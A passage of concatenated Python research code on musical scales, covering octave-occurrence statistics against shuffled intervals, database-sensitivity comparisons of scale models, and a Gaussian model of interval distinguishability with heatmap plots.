sum_ints = np.cumsum(ints[i:], dtype=int)
if sum_ints[-1] < (1200 - OCT_CUT):
break
# Find acceptable octave and call everything
# in between a scale
idx_oct = np.argmin(np.abs(sum_ints-1200))
oct_val = sum_ints[idx_oct]
if abs(oct_val - 1200) > OCT_CUT:
continue
scale = [0.] + list(sum_ints[:idx_oct+1])
names.append(row.Name)
scales.append(scale)
all_ints.append([scale[i] - scale[j] for j in range(len(scale)) for i in range(j+1,len(scale))])
pair_ints.append([scale[j+1] - scale[j] for j in range(len(scale)-1)])
cultures.append(row.Culture)
tunings.append(row.Tuning)
conts.append(row.Region)
ref.append(row.Reference)
theory.append('N')
start_from = idx_oct + i
return cultures, tunings, conts, names, scales, all_ints, pair_ints, ref, theory
```
#### File: Scales_database/Src/octave.py
```python
from itertools import product
import os
import matplotlib.pyplot as plt
from multiprocessing import Pool
import numpy as np
from palettable.colorbrewer.qualitative import Paired_12, Set2_8, Dark2_8, Pastel2_8, Pastel1_9
import pandas as pd
import seaborn as sns
from scipy.signal import argrelmax
from scipy.stats import mannwhitneyu, lognorm, norm
import process_csv
from process_csv import DATA_DIR
import utils
N_PROC = 60
def load_text_summary():
df = pd.read_excel('../scales_database.xlsx', "source_list")
Y1 = "Players exhibit octave?"
Y2 = "Sources indicate that octave is generally used in culture?"
for Y in [Y1, Y2]:
df.loc[df[Y].isnull(), Y] = ''
return df.loc[:, [Y1, Y2]]
def get_md2(ints):
if isinstance(ints, str):
ints = np.array([float(x) for x in ints.split(';')])
return np.min([np.sum(np.roll(ints, i)[:2]) for i in range(len(ints))])
# md2 = np.array([np.sum(np.roll(poss, i, axis=1)[:,:2], axis=1) for i in range(7)]).min(axis=0)
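# md2 is the smallest sum of two adjacent step intervals, treating the scale
# as cyclic via np.roll, e.g. get_md2('100;100;1000') -> 200.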
def instrument_tunings():
df = pd.concat([pd.read_excel('../scales_database.xlsx', f"scales_{a}") for a in 'BCDEF'], ignore_index=True)
df['Intervals'] = df.Intervals.apply(lambda x: utils.str_to_ints(x))
df['scale'] = df.Intervals.apply(np.cumsum)
df['max_scale'] = df.scale.apply(max)
df['min_int'] = df.Intervals.apply(min)
df['max_int'] = df.Intervals.apply(max)
df['AllInts'] = df.Intervals.apply(lambda x: [y for i in range(len(x)-1) for y in np.cumsum(x[i:])])
return df
def octave_chance(df, n_rep=10, plot=False, octave=1200, w=50):
df = df.loc[df.scale.apply(lambda x: x[-2] >= octave-w)]
print(len(df))
ints = df.Intervals.values
# all_ints = np.array([x for y in ints for x in np.cumsum(y)])
all_ints = np.array([x for y in ints for i in range(len(y)) for x in np.cumsum(y[i:])])
oct_real = all_ints[(all_ints>=octave-w)&(all_ints<=octave+w)]
print(len(oct_real), len(oct_real) / len(all_ints))
shuffled_ints = []
for j in range(n_rep):
for i in ints:
ran = np.random.choice(i, replace=False, size=len(i))
# for k in np.cumsum(ran):
# shuffled_ints.append(k)
for k in range(len(ran)):
for m in np.cumsum(ran[k:]):
shuffled_ints.append(m)
shuffled_ints = np.array(shuffled_ints)
idx = (shuffled_ints>=octave-w)&(shuffled_ints<=octave+w)
oct_shuf = shuffled_ints[idx]
print(len(oct_shuf) / len(shuffled_ints))
if plot:
fig, ax = plt.subplots(1,2)
sns.distplot(np.abs(oct_real-octave), bins=np.arange(0, w+10, 10), kde=False, norm_hist=True, ax=ax[0])
sns.distplot(np.abs(oct_shuf-octave), bins=np.arange(0, w+10, 10), kde=False, norm_hist=True, ax=ax[0])
sns.distplot(oct_real, bins=np.arange(octave-w, octave+w+10, 10), kde=False, norm_hist=True, ax=ax[1])
sns.distplot(oct_shuf, bins=np.arange(octave-w, octave+w+10, 10), kde=False, norm_hist=True, ax=ax[1])
print(mannwhitneyu(np.abs(oct_real-octave), np.abs(oct_shuf-octave)))
print(np.mean(np.abs(oct_real-octave)))
print(np.mean(np.abs(oct_shuf-octave)))
def label_sig(p):
    if p >= 0.05:
        return "NS"
    elif p >= 0.005:
        return '*'
    elif p >= 0.0005:
        return '**'
    elif p >= 0.00005:
        return '***'
    # p < 0.00005: strongest tier, so every p-value gets a label
    return '****'
def octave_chance_individual(df, n_rep=50, plot=False, octave=1200, w1=100, w2=20):
df = df.loc[df.scale.apply(lambda x: x[-2] >= octave)]
ints = df.Intervals.values
res = pd.DataFrame(columns=["max_scale", "n_notes", "ints", "oct_real", "oct_shuf", "mean_real", "mean_shuf", "MWU", "f_real", "f_shuf"])
for i in ints:
all_ints = np.array([x for j in range(len(i)) for x in np.cumsum(i[j:])])
oct_real = all_ints[(all_ints>=octave-w1)&(all_ints<=octave+w1)]
f_real = sum(np.abs(all_ints-octave)<=w2) / len(all_ints)
mean_real = np.mean(np.abs(oct_real-octave))
shuffled_ints = []
for j in range(n_rep):
ran = np.random.choice(i, replace=False, size=len(i))
for k in range(len(ran)):
for m in np.cumsum(ran[k:]):
shuffled_ints.append(m)
shuffled_ints = np.array(shuffled_ints)
idx = (shuffled_ints>=octave-w1)&(shuffled_ints<=octave+w1)
oct_shuf = shuffled_ints[idx]
f_shuf = sum(np.abs(shuffled_ints-octave)<=w2) / len(shuffled_ints)
mean_shuf = np.mean(np.abs(oct_shuf-octave))
try:
mwu = mannwhitneyu(np.abs(oct_real-octave), np.abs(oct_shuf-octave))[1]
except ValueError:
mwu = 1
res.loc[len(res)] = [sum(i), len(i), i, oct_real, oct_shuf, mean_real, mean_shuf, mwu, f_real, f_shuf]
res['sig'] = res.MWU.apply(label_sig)
return res
def create_new_scales(df, n_rep=10):
ints = [x for y in df.Intervals for x in y]
n_notes = df.scale.apply(len).values
df_list = []
for i in range(n_rep):
new_ints = [np.random.choice(ints, replace=True, size=n) for n in n_notes]
new_df = df.copy()
new_df.Intervals = new_ints
new_df['scale'] = new_df.Intervals.apply(np.cumsum)
df_list.append(new_df)
return df_list
def ideal_scale(ints, sigma):
N = len(ints)
imax = np.argmin(np.abs(np.cumsum(ints)-1200))
ints = ints[:imax]
ints = ints * 1200 / np.sum(ints)
new_ints = np.array([ints[i%len(ints)] for i in range(N)])
return new_ints + np.random.normal(0, sigma, size=N)
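# ideal_scale cuts the interval list just before the step whose cumulative
# sum is closest to 1200, rescales the remainder to exactly 1200 cents,
# tiles it back to the original length, and perturbs every step with
# Gaussian noise of width sigma.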
def create_ideal_scales(df):
ints = [x for y in df.Intervals for x in y if x < 800]
n_notes = df.scale.apply(len).values
sigma = np.arange(0, 55, 5)
df_list = []
for s in sigma:
new_ints = [ideal_scale(np.random.choice(ints, replace=True, size=n), s) for n in n_notes]
new_df = df.copy()
new_df.Intervals = new_ints
df_list.append(new_df)
return sigma, df_list
def get_stats(df, i, k, w1=100, w2=20, n_rep=50, nrep2=100):
out = np.zeros((3,nrep2), float)
path = f"../IntStats/{k}_w1{w1}_w2{w2}_I{i:04d}.npy"
print(path)
for j in range(nrep2):
res = octave_chance_individual(df, octave=i, n_rep=n_rep, w1=w1, w2=w2)
out[0,j] = len(res.loc[(res.MWU<0.05)&(res.mean_real<res.mean_shuf)])
out[1,j] = len(res.loc[(res.MWU<0.05)&(res.mean_real>res.mean_shuf)])
out[2,j] = len(res.loc[(res.MWU>=0.05)])
np.save(path, out)
return out.mean(axis=1)
def get_inst_subsample(df, xsamp, N):
idx = []
for x in df[xsamp].unique():
x_idx = df.loc[df[xsamp]==x].index
idx.extend(list(np.random.choice(x_idx, replace=True, size=min(N, len(x_idx)))))
return df.loc[idx]
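# Bootstrap-style subsample: draw at most N scales (with replacement) per
# category so that no single region/culture dominates downstream statistics.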
def unexpected_intervals(df):
ints = np.arange(200, 2605, 5)
for c in df['Region'].unique():
alt_df = df.loc[df["Region"]!=c]
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([alt_df], ints, [c], [100], [20]), 7)
for i in range(3):
alt_df = get_inst_subsample(df, 'Region', 10)
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([alt_df], ints, [f"contsamp{i}"], [100], [20]), 5)
for i in range(3):
alt_df = get_inst_subsample(df, 'Culture', 5)
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([alt_df], ints, [f"cultsamp{i}"], [100], [20]), 5)
df = df.loc[:, ['Intervals', 'scale']]
w1_list = [50, 75, 100, 125, 150, 175, 200]
w2_list = [5, 10, 15, 20, 30, 40]
for w1 in w1_list:
for w2 in w2_list:
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([df], ints, [0], [w1], [w2]), 7)
alt_df = create_new_scales(df, n_rep=3)
with Pool(N_PROC) as pool:
for i in range(3):
res = pool.starmap(get_stats, product([alt_df[i]], ints, [i+1]), 9)
sigma, ideal_df = create_ideal_scales(df)
with Pool(N_PROC) as pool:
for i, s in enumerate(sigma):
res = pool.starmap(get_stats, product([ideal_df[i]], ints, [f"sigma{s}"]), 9)
def get_norm_posterior(Y, s, m):
n = len(Y)
sy = np.sum(Y)
sy2 = np.sum(np.square(Y))
a = n / (2 * s**2)
b = sy / (s**2)
c = - sy2 / (2 * s**2)
A = 0.5 * (sy2 + n * m**2 - 2 * m * sy)
left = (a/np.pi)**0.5 * np.exp(-a * m**2 + b * m - b**2 / (4*a))
right = A**(n/2) / (2*np.pi*n) * np.exp(-A / s**2 - n*np.log(n)-1) / s**(n+2)
return left * right
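# evaluate_best_fit_lognorm evaluates this posterior on a (sigma, mu) grid
# for log-transformed intervals, subsampling six scales per region so that
# heavily-sampled regions do not dominate the fit.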
def evaluate_best_fit_lognorm(df):
Y = [x for c in df.Region.unique() for y in np.random.choice(df.loc[df.Region==c, "AllInts"], size=6) for x in y]
Yl = np.log(np.array(Y))
s_arr = np.linspace(0, 2, 1001)[1:]
m_arr = np.linspace(np.log(25), np.log(6000), 1001)
si, mi = np.meshgrid(s_arr, m_arr)
return get_norm_posterior(Yl, si, mi)
def get_int_prob_via_sampling(df, ysamp='AllInts', xsamp='Region', s=6, ax='', fa=0.5):
if len(xsamp):
Y = [x for c in df[xsamp].unique() for y in np.random.choice(df.loc[df[xsamp]==c, ysamp], size=s) for x in y]
else:
Y = [x for y in df[ysamp] for x in y]
# Yl = np.log(np.array(Y))
# print(norm.fit(Yl))
col = np.array(Set2_8.mpl_colors)
bins = np.arange(15, 5000, 30)
dx = np.diff(bins[:2])
X = bins[:-1] + dx / 2.
# shape, loc, scale = lognorm.fit(Y)
shape, loc, scale = [0.93, -45.9, 605.4]
params = lognorm.fit(Y, loc=loc, scale=scale)
print(params)
boot = np.array([np.histogram(lognorm.rvs(*params, len(Y)), bins=bins, density=True)[0] for i in range(10000)])
if isinstance(ax, str):
fig, ax = plt.subplots()
count = np.histogram(Y, bins=bins)[0]
hist = np.histogram(Y, bins=bins, density=True)[0]
p1 = lognorm.pdf(X, *params)
p2 = lognorm.pdf(bins, *params)
p3 = np.array([0.5*(lo+hi) * dx for lo, hi in zip(p2[:-1], p2[1:])])
ax.plot(X, hist, '-', c=col[1], lw=0.9)
ax.plot(X, p1, ':k')
ax.fill_between(X, *[np.quantile(boot, q, axis=0) for q in [0.01, 0.99]], color=col[0], alpha=fa)
# for imax in argrelmax(hist)[0]:
# p = p3[imax]**count[imax]
# print(X[imax], p3[imax], count[imax], sum(count))
if __name__ == "__main__":
df = instrument_tunings()
unexpected_intervals(df)
```
#### File: Src/Analysis/database_sensitivity.py
```python
import argparse
import glob
import os
import pickle
import sys
import time
from itertools import product
import matplotlib.pyplot as plt
import multiprocessing as mp
import numpy as np
import pandas as pd
import seaborn as sns
import statsmodels.nonparametric.api as smnp
import swifter
import utils
import graphs
N_PROC = 10
BASE_DIR = '/home/johnmcbride/projects/Scales/Data_compare/'
RAW_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Raw/'
PRO_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Processed/'
REAL_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Samples')
DIST_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Sample_dist')
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
pass
else:
RE += pk[i] * np.log(pk[i] / qk[i])
return RE
def calc_jensen_shannon_distance(pk, qk):
mk = 0.5 * (pk + qk)
return (0.5 * (calc_relative_entropy(pk, mk) + calc_relative_entropy(qk, mk))) ** 0.5
def smooth_dist_kde(df, cat='pair_ints', hist=False, nbins=1202):
X = [float(x) for y in df.loc[:,cat] for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit(kernel='gau', bw='scott', fft=1, gridsize=10000, cut=20)
grid = np.linspace(0, 1200, num=nbins-1)
y = np.array([kde.evaluate(x) for x in grid]).reshape(nbins-1)
if hist:
        xtra = (1200./(nbins-2))/2.
bins = np.linspace(-xtra, 1200+xtra, num=nbins)
        hist, bins = np.histogram(X, bins=bins, density=True)
return grid, y, hist
else:
return grid, y
def get_KDE(df, cat):
xKDE, yKDE = smooth_dist_kde(df, cat=cat)
return yKDE / np.trapz(yKDE)
def get_dists_file(s, cat='pair_ints', nbins=1202):
out = {}
    if not os.path.exists(os.path.join(DIST_DIR, f"{s}_{cat}_n7_hist.npy")):
df = pd.read_feather(os.path.join(REAL_DIR, f"{s}.feather"))
for n in [5,7]:
fHist = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_hist.npy")
fKDE = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_kde.npy")
if os.path.exists(fHist):
X, hist = np.load(fHist)
X, kde = np.load(fKDE)
else:
X, kde, hist = smooth_dist_kde(df.loc[df.n_notes==n], cat=cat, hist=True, nbins=nbins)
np.save(fHist, np.array([X, hist]))
np.save(fKDE, np.array([X, kde]))
out[n] = [X, kde, hist]
return out
def how_much_real_scales_predicted(df, n_real, w, s):
# try:
return float(len(set([int(x) for y in df[f"{s}_w{w:02d}"] for x in y.split(';') if len(y)]))) / float(n_real)
# except:
# return None
def rename_processed_files(f, s='sample_'):
root, fName = os.path.split(f)
print(root, fName)
return os.path.join(root, f"{s}{fName}")
def load_model_filenames():
paths = pickle.load(open(os.path.join(BASE_DIR, 'best_models.pickle'), 'rb'))
return [rename_processed_files(paths[k][n]) for k, n in product(paths.keys(), [5,7])]
def calculate_metrics(y1, y2):
y1 = y1.reshape(y1.size)
y2 = y2.reshape(y2.size)
err_sq = np.sqrt(np.dot(y1-y2, y1-y2))
d1 = y1[1:] - y1[:-1]
d2 = y2[1:] - y2[:-1]
deriv_es = np.sqrt(np.dot(d1-d2, d1-d2))
return [err_sq, deriv_es, (err_sq * deriv_es)**0.5]
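# The three metrics are the L2 distance between the two distributions, the
# L2 distance between their first differences, and the geometric mean of both.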
def scale_rsq(Y1, Y2):
SStot = np.sum((Y1 - np.mean(Y1))**2)
SSres = np.sum((Y1 - Y2)**2)
return 1 - SSres/SStot
if __name__ == "__main__":
timeS = time.time()
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--partabase', action='store', default='None', type=str)
args = parser.parse_args()
categories = ['pair_ints', 'scale']
n_arr = np.arange(4,10,dtype=int)
samples = ['theory', 'instrument'] + [f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]
files = [f"{s}.feather" for s in samples]
int_dists = [get_dists_file(s) for s in samples]
hist_dists = [get_dists_file(s, cat='scale', nbins=42) for s in samples]
# print(f"Real scales loaded after {(time.time()-timeS)/60.} minutes")
pro_files = load_model_filenames()
def extract_stats_each_model(fName):
df = pd.read_feather(fName)
bits = os.path.split(fName)[1].split('_')
n = int(bits[1].strip('n'))
idx = [i for i in range(len(bits)) if bits[i][0]=='M'][0]
bias = '_'.join(bits[2:idx])
mi = int(bits[idx].strip('MI'))
ma = int(bits[idx+1].strip('MA'))
beta = float(bits[-1].strip('.feather'))
n_sample = df.n_att.sum()
q = float(len(df))/float(n_sample)
output = [n, mi, ma, bias, beta, q, n_sample]
X, iKDE, iHist = smooth_dist_kde(df, cat='pair_ints', hist=True)
X, sKDE, sHist = smooth_dist_kde(df, cat='scale', hist=True, nbins=42)
for i, f in enumerate(files):
df_real = pd.read_feather(os.path.join(REAL_DIR, f))
n_real = len(df_real.loc[df_real.n_notes==n])
frac_real = [how_much_real_scales_predicted(df, n_real, w, f'{samples[i]}_ss') for w in [10, 20]]
metrics = calculate_metrics(int_dists[i][n][1], iKDE)
scale_R2 = scale_rsq(sHist,hist_dists[i][n][2])
output.extend([n_real] + frac_real + metrics + [scale_R2])
return output + [fName]
biases = ['none',
'distI_1_0', 'distI_2_0', 'distI_3_0', 'distI_0_1', 'distI_0_2',
'distI_1_1', 'distI_2_1', 'distI_1_2', 'distI_2_2',
'opt_c', 'opt_c_I1', 'opt_c_I2', 'opt_c_s2', 'opt_c_s3'] + \
[f"hs_n{i}_w{w:02d}" for i in range(1,4) for w in [5,10,15,20]] + \
[f"hs_r3_w{w:02d}" for w in [5,10,15,20]] + \
[f"ahs{i:02d}_w{w:02d}" for i in range(1,11) for w in [5,10,15,20]] + \
[f"im5_r{r:3.1f}_w{w:02d}" for r in [0, 0.5, 1, 2] for w in [5,10,15,20]] + \
[f"Nhs_n1_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n2_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n3_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nim5_r0.0_w{w:02d}" for w in [5,10,15,20]] + \
[f"TRANSB_{i}" for i in [1,2,3]] + \
[f"TRANS{a}_{b}" for a in ['A', 'B'] for b in range(1,4)] + \
[f"HAR_{b}_{a}" for a in range(1,4) for b in range(5,25,5)] + \
[f"{a}_{b}" for a in ['HAR', 'FIF'] for b in range(5,25,5)]
# ['hs_r3_w05', 'hs_r3_w10', 'hs_r3_w15', 'hs_r3_w20'] + \
# [f"im5_r0.75_w{w:02d}" for w in [5,10,15,20] +
groups = ['none'] + ['distI']*3 + ['S#1']*2 + ['distI_S#1']*4 + \
['distW'] + ['distW_S#1']*2 + ['distW_S#2']*2 + ['HS']*12 + ['im5']*4 + ['AHS']*40 + ['im5']*16 + \
['HS']*12 + ['im5']*4 + ['TRANSB']*3 + \
['TRANS']*6 + ['HAR']*4 + ['HAR2']*4 + ['HAR3']*4 + ['HAR']*4 + ['FIF']*4
bias_groups = {biases[i]:groups[i] for i in range(len(biases))}
with mp.Pool(N_PROC) as pool:
results = list(pool.imap_unordered(extract_stats_each_model, pro_files))
print(f"Model comparison finished after {(time.time()-timeS)/60.} minutes")
df = pd.DataFrame(columns=['n_notes', 'min_int', 'max_int', 'bias', 'beta', 'quantile', 'n_sample'] + \
[f"{s}_{a}" for s in samples for a in ['n_real', 'fr_10', 'fr_20', 'RMSD', 'dRMSD', 'met1', 'sRMSD']] + \
['fName'], data=results)
df['bias_group'] = df.bias.apply(lambda x: bias_groups[x])
df['logq'] = np.log10(df['quantile'])
df = graphs.rename_bias_groups(df)
df = graphs.rename_biases(df)
print(f"DataFrame compiled after {(time.time()-timeS)/60.} minutes")
if args.partabase == 'None':
df.to_feather(os.path.join(BASE_DIR, 'Processed', 'database_sensitivity.feather'))
```
#### File: Distinguishability/Src/calculate_distinguishability.py
```python
import os
import string
import sys
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import multiprocessing as mp
import numpy as np
import pandas as pd
from palettable.colorbrewer.qualitative import Paired_12
import seaborn as sns
import scipy.stats as stats
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}']
INT_MIN = 0.
INT_MAX = 250.
D_INT = 5.
ACC = 0.99
INTS = np.arange(INT_MIN, INT_MAX, D_INT)
FIGS_DIR = '/home/johnmcbride/Dropbox/phd/LaTEX/Scales/Figures/'
def gaussian(x, mean, var):
return np.exp( - (x - mean)**2 / (2. * var)) / (var * 2 * np.pi)**0.5
def integrate_gauss(mean, var, x1, x2, num=1000):
X = np.linspace(x1, x2, num=num)
P = gaussian(X, mean, var)
# return X, P
return np.trapz(P, X)
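# Example: the probability mass of a unit-variance Gaussian within one
# standard deviation of its mean,
#   integrate_gauss(0., 1., -1., 1.) -> ~0.683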
def get_percentage_correct_from_range_of_ints(dI, prod_var, percep_var, ints=INTS):
correct = []
for I0 in ints:
int_cats = np.arange(0, I0*2, dI)
prob_produced = []
prob_correct = []
for I1 in int_cats:
prod_prob = integrate_gauss(I0, prod_var, I1-dI/2., I1+dI/2.)
percep_prob = [integrate_gauss(i, percep_var, I1-dI/2., I1+dI/2.) for i in [0, I0, I0*2]]
prob_produced.append(prod_prob)
prob_correct.append(percep_prob[1] / sum(percep_prob))
correct.append(np.sum(np.array(prob_produced) * np.array(prob_correct)) / np.sum(prob_produced))
return np.array(correct)
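# The variant below is identical except that perception is modelled with two
# categories (unison and I0) rather than three (unison, I0, and 2*I0).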
def get_percentage_correct_from_range_of_ints_2(dI, prod_var, percep_var, ints=INTS):
correct = []
for I0 in ints:
int_cats = np.arange(0, I0*2, dI)
prob_produced = []
prob_correct = []
for I1 in int_cats:
prod_prob = integrate_gauss(I0, prod_var, I1-dI/2., I1+dI/2.)
percep_prob = [integrate_gauss(i, percep_var, I1-dI/2., I1+dI/2.) for i in [0, I0]]
prob_produced.append(prod_prob)
prob_correct.append(percep_prob[1] / sum(percep_prob))
correct.append(np.sum(np.array(prob_produced) * np.array(prob_correct)) / np.sum(prob_produced))
return np.array(correct)
def get_interval_by_accuracy(ints, correct, acc=ACC):
try:
i = np.where(correct > acc)[0][0]
except:
i = np.argmin(np.abs(correct - acc))
if i:
return ints[i-1] + (ints[i] - ints[i-1]) * (acc - correct[i-1]) / (correct[i] - correct[i-1])
else:
return ints[0]
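# The threshold interval is linearly interpolated between the two grid
# points straddling `acc`; if that accuracy is never reached, the nearest
# point is used instead.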
def plot_distinguishability_by_grid_size():
dI = 5
dI_arr = [3, 5, 10, 20, 25, 30]
prod_sdev_arr = np.arange(5., 32.5, 2.5)
percep_sdev_arr = np.arange(5., 32.5, 2.5)
fig1, ax1 = plt.subplots(2,3)
ax1 = ax1.reshape(ax1.size)
df_list = []
for i, dI in enumerate(dI_arr):
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(24)
correct = pool.starmap(get_percentage_correct_from_range_of_ints, [(dI, prod_in[i]**2, percep_in[i]**2) for i in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
df_list.append(pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size}))
sns.heatmap(df_list[i].pivot('production', 'perception', 'threshold'), ax=ax1[i], vmin=50, vmax=180, annot=True)
ax1[i].invert_yaxis()
ax1[i].set_title(f"dI = {dI}")
# plt.legend(loc='best')
# plt.plot(np.arange(50, 550, 50), thresh_int)
plt.show()
def plot_distinguishability_ranges():
dI = 5
min_prod = [5., 10., 30.]
min_per = [10., 20., 40.]
rang = 27.5
titles = ['expert', 'good_untrained', 'bad_untrained']
fig, ax = plt.subplots(3)
for i in range(3):
prod_sdev_arr = np.arange(min_prod[i], min_prod[i]+rang, 2.5)
percep_sdev_arr = np.arange(min_per[i], min_per[i]+rang, 2.5)
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(28)
correct = pool.starmap(get_percentage_correct_from_range_of_ints, [(dI, prod_in[j]**2, percep_in[j]**2) for j in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
annot = np.zeros(xi.shape, dtype='<U3')
np.fill_diagonal(annot, [str(int(x)) for x in np.array(thresh_list).reshape(xi.shape).T.diagonal()])
df = pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size})
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax[i], vmin=50, vmax=180, annot=annot, fmt="s")
ax[i].invert_yaxis()
ax[i].set_title(titles[i])
plt.show()
def plot_distinguishability_ranges_one_plot():
dI = 5
min_prod = [10., 20., 40.]
min_per = [10., 20., 40.]
rang = 27.5
titles = ['expert', 'good_untrained', 'bad_untrained']
fig, ax = plt.subplots()
prod_sdev_arr = np.arange(5, 57.5, 5)
percep_sdev_arr = np.arange(5, 57.5, 5)
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(28)
correct = pool.starmap(get_percentage_correct_from_range_of_ints, [(dI, prod_in[j]**2, percep_in[j]**2) for j in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
annot = np.zeros(xi.shape, dtype='<U3')
np.fill_diagonal(annot, [str(int(x)) for x in np.array(thresh_list).reshape(xi.shape).T.diagonal()])
np.save('Results/annotations', annot)
df = pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size})
df.to_feather(f'Results/three_notes_acc{ACC}.feather')
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax, vmin=30, vmax=300, annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks)
ax.invert_yaxis()
ax_scale = 5.0
ax.set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax.set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
plt.savefig('Figs/accurate_intervals.png', dpi=1200)
plt.savefig('Figs/accurate_intervals.pdf', dpi=1200)
# plt.show()
def plot_distinguishability_two_notes():
dI = 5
min_prod = [10., 20., 40.]
min_per = [10., 20., 40.]
rang = 27.5
titles = ['expert', 'good_untrained', 'bad_untrained']
fig, ax = plt.subplots()
prod_sdev_arr = np.arange(2.5, 57.5, 2.5)
percep_sdev_arr = np.arange(2.5, 57.5, 2.5)
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(28)
correct = pool.starmap(get_percentage_correct_from_range_of_ints_2, [(dI, prod_in[j]**2, percep_in[j]**2) for j in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
annot = np.zeros(xi.shape, dtype='<U3')
np.fill_diagonal(annot, [str(int(x)) for x in np.array(thresh_list).reshape(xi.shape).T.diagonal()])
df = pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size})
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax, vmin=30, vmax=300, annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks)
ax.invert_yaxis()
ax_scale = 2.5
ax.set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax.set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
plt.savefig('Figs/two_notes_accurate_intervals.png', dpi=1200)
plt.savefig('Figs/two_notes_accurate_intervals.pdf', dpi=1200)
# plt.show()
def plot_frac_correct():
fig, ax = plt.subplots()
dI = 2
for std in [5, 10, 20, 40]:
correct = get_percentage_correct_from_range_of_ints(dI, std**2, std**2)
ax.plot(INTS, correct, label=r"$\sigma = {0}$".format(std))
ax.legend(loc='best', frameon=False)
plt.show()
def plot_heatmap():
fig, ax = plt.subplots()
df = pd.read_feather(f'Results/three_notes_acc{ACC}.feather')
annot = np.load('Results/annotations.npy')
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax, vmin=30, vmax=300, annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks)
ax.invert_yaxis()
ax_scale = 5.0
ax.set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax.set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
plt.savefig('Figs/accurate_intervals.png', dpi=1200)
plt.savefig('Figs/accurate_intervals.pdf', dpi=1200)
def plot_SI():
fig = plt.figure(figsize=(10,5))
gs = gridspec.GridSpec(2,3, width_ratios=[1.0, 1.0, 1.8], height_ratios=[1.0, 1.0])
gs.update(wspace=0.30 ,hspace=0.40)
ax = [fig.add_subplot(gs[0,0]),fig.add_subplot(gs[1,0]),fig.add_subplot(gs[:,1]),fig.add_subplot(gs[:,2])]
std = 20
X = np.linspace(0, 200, num=1000)
ax[0].plot(X, stats.norm.pdf(X, 100, std), label=f"Category A", c='k')
col = ['k'] + list(np.array(Paired_12.mpl_colors)[[1,3,5]])
cat = [f"Category {s}" for s in 'ABC']
Y = []
for i, mu in enumerate([100, 50, 150]):
Y.append(stats.norm.pdf(X, mu, std))
# ax[1].plot(X, stats.norm.pdf(X, mu, std), label=cat[i], c=col[i])
Y = np.array(Y)
ysum = np.sum(Y, axis=0)
Y = Y/ysum
for i, mu in enumerate([100, 50, 150]):
ax[1].plot(X, Y[i], '-', label=cat[i], c=col[i])
ax[0].set_xlabel("Produced interval")
ax[1].set_xlabel("Produced interval")
ax[0].set_ylabel("Probability")
ax[1].set_ylabel(r"$P_{Cat}$")
ax[0].set_ylim(0, 0.035)
ax[1].set_ylim(0, 1.70)
ax[0].set_yticks([])
ax[1].set_yticks([0,1])
for a in ax[:2]:
a.legend(loc='upper right', frameon=False)
dI = 2
for i, std in enumerate([5, 10, 20, 40]):
correct = get_percentage_correct_from_range_of_ints(dI, std**2, std**2)
line, = ax[2].plot(INTS, correct, label=r"$\sigma = {0}$".format(std), c='k')
line.set_dashes([12-i*2-3, 3+i*0])
ax[2].legend(loc='best', frameon=False)
ax[2].plot([0,250],[.99]*2, '-', c=col[3], alpha=0.7)
ax[2].set_xlim(0, 250)
ax[2].set_xlabel(r'$I_{\textrm{min}}$')
